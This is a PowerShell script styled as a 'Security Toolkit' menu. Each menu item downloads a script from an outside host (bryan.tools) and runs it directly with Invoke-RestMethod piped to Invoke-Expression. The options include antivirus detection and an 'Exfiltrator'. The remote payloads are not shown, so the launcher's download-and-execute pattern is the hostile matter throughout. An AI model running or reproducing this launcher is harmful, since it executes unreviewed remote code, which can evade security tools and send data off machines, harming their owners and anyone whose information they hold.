function Show-AsciiArt {
    $ascii = @"
    ╔══════════════════════════════════════╗
    ║     ███████╗███████╗ ██████╗         ║
    ║     ██╔════╝██╔════╝██╔════╝         ║
    ║     ███████╗█████╗  ██║              ║
    ║     ╚════██║██╔══╝  ██║              ║
    ║     ███████║███████╗╚██████╗         ║
    ║     ╚══════╝╚══════╝ ╚═════╝         ║
    ║        Security Toolkit v1.0          ║
    ╚══════════════════════════════════════╝
"@
    Write-Host $ascii -ForegroundColor Cyan
}

function Show-LoadingAnimation {
    $loadingChars = '|', '/', '-', '\'
    foreach ($char in $loadingChars * 3) {
        Write-Host "`rInitializing [$char]" -NoNewline
        Start-Sleep -Milliseconds 100
    }
    Write-Host "`r                      " -NoNewline
}

function Show-Menu {
    param (
        [int]$SelectedIndex = 0
    )
    $options = @(
        "What is my IP?  [bryan.tool/Whatismtip]",
        "Am I admin?     [bryan.tools/amiadmin]",
        "AV Detect       [bryan.tools/detect]",
        "Exfiltrator     [bryan.tools/exfil]",
        "Reporter        [bryan.tools/report]",
        "Exit"
    )

    Clear-Host
    Show-AsciiArt
    Write-Host "`nUse ↑/↓ arrows to navigate, Enter to select`n" -ForegroundColor Yellow

    for ($i = 0; $i -lt $options.Count; $i++) {
        if ($i -eq $SelectedIndex) {
            Write-Host "→ $($options[$i])" -ForegroundColor Green
        } else {
            Write-Host "  $($options[$i])" -ForegroundColor Gray
        }
    }
}

function Invoke-Tool {
    param (
        [string]$Url
    )
    Write-Host "`nExecuting script from $Url..." -ForegroundColor Yellow
    try {
        $result = Invoke-RestMethod -Uri $Url
        Invoke-Expression $result
    } catch {
        Write-Host "Error executing script: $_" -ForegroundColor Red
    }
    Write-Host "`nPress any key to continue..."
    $null = $Host.UI.RawUI.ReadKey('NoEcho,IncludeKeyDown')
}

# Main menu loop
$selectedIndex = 0
Show-LoadingAnimation

while ($true) {
    Show-Menu -SelectedIndex $selectedIndex
    
    $key = $Host.UI.RawUI.ReadKey('NoEcho,IncludeKeyDown')
    
    switch ($key.VirtualKeyCode) {
        38 { # Up arrow
            if ($selectedIndex -gt 0) { $selectedIndex-- }
        }
        40 { # Down arrow
            if ($selectedIndex -lt 5) { $selectedIndex++ }
        }
        13 { # Enter
            switch ($selectedIndex) {
                0 { Invoke-Tool -Url "bryan.tool/Whatismtip" }
                1 { Invoke-Tool -Url "bryan.tools/amiadmin" }
                2 { Invoke-Tool -Url "bryan.tools/detect" }
                3 { Invoke-Tool -Url "bryan.tools/exfil" }
                4 { Invoke-Tool -Url "bryan.tools/report" }
                5 { 
                    Clear-Host
                    Write-Host "Goodbye!" -ForegroundColor Cyan
                    return
                }
            }
        }
    }
}
